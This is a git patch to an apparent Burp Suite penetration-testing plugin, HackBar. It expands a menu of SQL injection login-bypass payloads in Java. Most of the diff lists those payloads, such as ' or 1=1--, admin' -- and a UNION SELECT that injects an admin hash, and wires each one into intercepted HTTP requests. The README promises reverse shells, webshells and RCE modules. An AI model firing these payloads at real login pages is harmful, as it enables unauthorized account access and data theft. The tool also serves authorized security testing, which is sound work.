From a4bb3d6c0b52631927465110e9037c42e863c5fe Mon Sep 17 00:00:00 2001 From: root Date: Sat, 8 Sep 2018 02:59:05 +0500 Subject: [PATCH] Updated SQLi Login bypass --- README.md | 7 +- build/built-jar.properties | 2 +- build/classes/burp/SQL_Menu.class | Bin 2379 -> 2377 bytes nbproject/private/private.xml | 3 + src/burp/SQli_LoginBypass.java | 153 ++++++++++++++++++++++++++++-- 5 files changed, 155 insertions(+), 10 deletions(-) diff --git a/README.md b/README.md index 4c085cd..1d8bc33 100644 --- a/README.md +++ b/README.md @@ -19,12 +19,12 @@ ### Download - Download Jar https://github.com/d3vilbug/HackBar/releases and add in burpsuite + Download Jar 'https://github.com/d3vilbug/HackBar/releases' and add in burpsuite ### Tested on - Burpsuite 1.7.36 - Windows 7/8.1/10 -- Kali linux (2013.3) +- Kali linux (2018.3) ### Upcoming Features/Modules - XSS payload @@ -34,9 +34,10 @@ - Reverse Shell Code snippets - Decoder/Encoder - LFI payloads -- XXE +- XXE - RCE - Mini Webshells +- Simulate Attack (Automatically test complete cheat sheet with one click) ### Greet - An0n 3xPloiTeR https://github.com/Anon-Exploiter/ for SQLi && XSS payloads \ No newline at end of file diff --git a/build/built-jar.properties b/build/built-jar.properties index 4f366cd..51a92f8 100644 --- a/build/built-jar.properties +++ b/build/built-jar.properties @@ -1,4 +1,4 @@ -#Fri, 07 Sep 2018 00:39:59 +0500 +#Sat, 08 Sep 2018 01:56:29 +0500 C\:\\Users\\bugzy\\Documents\\NetBeansProjects\\Burp_Plugins\\HackBar= diff --git a/build/classes/burp/SQL_Menu.class b/build/classes/burp/SQL_Menu.class index dd2274621d298cf56b5efbab1d04c85e0f0263a8..8350fd153a73b4df256a5e3730d0119b70fc5ecb 100644 GIT binary patch delta 19 acmX>tbW&(T02>=mQfX0v{^kg_&rASCF9yE= delta 21 ccmX>pbXsUb02>EiQfX0vzHjB`Ft*Q308_jNhX4Qo diff --git a/nbproject/private/private.xml b/nbproject/private/private.xml index 8bb5918..c99654c 100644 --- a/nbproject/private/private.xml +++ b/nbproject/private/private.xml @@ -3,7 +3,10 @@ + file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/HackBar/src/burp/Methods.java + file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/HackBar/src/burp/SQli_LoginBypass.java file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/HackBar/src/burp/SQL_Menu.java + file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/HackBar/src/burp/BurpExtender.java diff --git a/src/burp/SQli_LoginBypass.java b/src/burp/SQli_LoginBypass.java index af7bf2e..48f1eb8 100644 --- a/src/burp/SQli_LoginBypass.java +++ b/src/burp/SQli_LoginBypass.java @@ -21,7 +21,7 @@ public class SQli_LoginBypass extends JMenu { public String[] Login_Menu = {"Set 1","Set 2","Set 3","Set 4","Set 5"}; public String LoginMenuItems[][] = { {"' or ''='", "' or 1='1", "' or '1'='1", "' or ' 1=1", "' or 1=1--", "' or 1=1#", "' or 1=1/*", "') or '1'='1--", "') or ('1'='1--", "' or 1=1)#"}, - {"' or '1?='1", "' or 'x'='x", "' or 0=0 –", "or 0=0 –", "' or 0=0 #", "or 0=0 #", "' or 'x'='x", "') or ('x'='x", "' or 1=1–", "' or a=a–"}, + {"' or '1?='1", "' or 'x'='x", "' or 0=0 –", "or 0=0 –", "' or 0=0 #", "or 0=0 #", "') or ('x'='x", "' or 1=1–", "' or a=a–"}, {"') or ('a'='a", "hi' or 1=1 –", "'or'1=1?", "'-'", "' '", "'&'", "'^'", "'*'", "' or ''-'", "' or '' '"}, {"' or ''&'", "' or ''^'", "' or ''*'", "or true--", "' or true--", "') or ('x')=('x", "')) or (('x'))=(('x", "admin' --", "admin' #", "admin'/*"}, {"admin' or '1'='1", "admin' or '1'='1'--", "admin' or '1'='1'#", "admin' or '1'='1'/*", "admin'or 1=1 or ''='", "admin') or ('1'='1", "admin') or ('1'='1'/*", "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055"}, @@ -57,14 +57,155 @@ public void actionPerformed(ActionEvent e) { String action = e.getActionCommand(); byte[] newRequest = do_loginBypass(request, selectString, action, selectedIndex); req.setRequest(newRequest); - JOptionPane.showMessageDialog(null, action); } public byte[] do_loginBypass(byte[] request, String selectedString, String action, int[] selectedIndex){ -// swtich(action){ -// case " a": -// break; -// } + switch(action){ + case "' or ''='": + selectedString = "' or ''='"; + break; + case "' or 1='1": + selectedString = "' or 1='1"; + break; + case "' or '1'='1": + selectedString = "' or '1'='1"; + break; + case "' or ' 1=1": + selectedString = "' or ' 1=1"; + break; + case "' or 1=1--": + selectedString = "' or 1=1--"; + break; + case "' or 1=1#": + selectedString = "' or 1=1#"; + break; + case "' or 1=1/*": + selectedString = "' or 1=1/*"; + break; + case "') or '1'='1--": + selectedString = "') or '1'='1--"; + break; + case "') or ('1'='1--": + selectedString = "') or ('1'='1--"; + break; + case "' or 1=1)#": + selectedString = "' or 1=1)#"; + break; + case "' or '1?='1": + selectedString = "' or '1?='1"; + break; + case "' or 'x'='x": + selectedString = "' or 'x'='x"; + break; + case "' or 0=0 –": + selectedString = "' or 0=0 –"; + break; + case "or 0=0 –": + selectedString = "or 0=0 –"; + break; + case "' or 0=0 #": + selectedString = "' or 0=0 #"; + break; + case "or 0=0 #": + selectedString = "or 0=0 #"; + break; + case "') or ('x'='x": + selectedString = "') or ('x'='x"; + break; + case "' or 1=1–": + selectedString = "' or 1=1–"; + break; + case "' or a=a–": + selectedString = "' or a=a–"; + break; + case "') or ('a'='a": + selectedString = "') or ('a'='a"; + break; + case "hi' or 1=1 –": + selectedString = "hi' or 1=1 –"; + break; + case "'or'1=1?": + selectedString = "'or'1=1?"; + break; + case "'-'": + selectedString = "'-'"; + break; + case "' '": + selectedString = "' '"; + break; + case "'&'": + selectedString = "'&'"; + break; + case "'^'": + selectedString = "'^'"; + break; + case "'*'": + selectedString = "'*'"; + break; + case "' or ''-'": + selectedString = "' or ''-'"; + break; + case "' or '' '": + selectedString = "' or '' '"; + break; + case "' or ''&'": + selectedString = "' or ''&'"; + break; + case "' or ''^'": + selectedString = "' or ''^'"; + break; + case "' or ''*'": + selectedString = "' or ''*'"; + break; + case "or true--": + selectedString = "or true--"; + break; + case "' or true--": + selectedString = "' or true--"; + break; + case "') or ('x')=('x": + selectedString = "') or ('x')=('x"; + break; + case "')) or (('x'))=(('x": + selectedString = "')) or (('x'))=(('x"; + break; + case "admin' --": + selectedString = "admin' --"; + break; + case "admin' #": + selectedString = "admin' #"; + break; + case "admin'/*": + selectedString = "admin'/*"; + break; + case "admin' or '1'='1": + selectedString = "admin' or '1'='1"; + break; + case "admin' or '1'='1'--": + selectedString = "admin' or '1'='1'--"; + break; + case "admin' or '1'='1'#": + selectedString = "admin' or '1'='1'#"; + break; + case "admin' or '1'='1'/*": + selectedString = "admin' or '1'='1'/*"; + break; + case "admin'or 1=1 or ''='": + selectedString = "admin'or 1=1 or ''='"; + break; + case "admin') or ('1'='1": + selectedString = "admin') or ('1'='1"; + break; + case "admin') or ('1'='1'/*": + selectedString = "admin') or ('1'='1'/*"; + break; + case "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055": + selectedString = "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055"; + break; + default: + selectedString = selectedString; + } + selectedString = selectedString.replace(" ", "+"); return Methods.do_modify_request(request, selectedIndex, selectedString); }